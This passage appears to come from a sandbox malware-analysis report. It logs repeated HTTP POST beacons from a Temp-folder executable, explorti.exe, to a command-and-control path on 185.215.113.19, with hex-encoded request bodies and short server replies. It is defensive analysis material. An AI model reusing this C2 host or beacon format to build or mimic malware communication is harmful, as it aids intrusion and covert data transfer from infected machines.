Sep 1, 2024 06:28:26.303783894 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:28:27.059437037 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:28:27.063491106 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:28:27.314143896 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49768	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:28:27.439834118 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:28:28.217773914 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:28:28.218511105 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:28:28.479645014 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49769	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:28:28.596560955 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:28:29.359502077 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:28:29.360232115 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:28:29.619127989 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49770	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:28:29.747852087 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:28:30.516211987 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:28:30.516968012 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:28:30.767627954 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49771	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:28:30.933826923 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:28:31.649106026 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:28:31.764283895 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:28:32.018194914 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49772	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:28:32.617850065 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:28:33.313924074 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:28:33.314582109 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:28:33.562179089 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49773	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:28:33.681332111 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:28:34.429485083 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:28:34.435228109 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:28:34.685169935 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49774	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:28:34.798963070 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:28:35.551651001 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:28:35.553257942 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:28:35.802583933 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49775	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:28:35.925349951 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:28:36.667182922 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:28:36.668188095 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:28:36.914449930 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49776	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:28:37.046829939 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:28:37.790527105 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:28:37.791276932 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:28:38.040930033 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	49777	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:28:38.159517050 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:28:38.922188997 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:28:38.922816992 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:28:39.174200058 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	49778	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:28:39.286936998 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:28:40.027753115 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:28:40.097448111 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:28:40.560564041 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Sep 1, 2024 06:28:40.562256098 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	49779	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:28:40.673950911 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:28:41.416515112 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
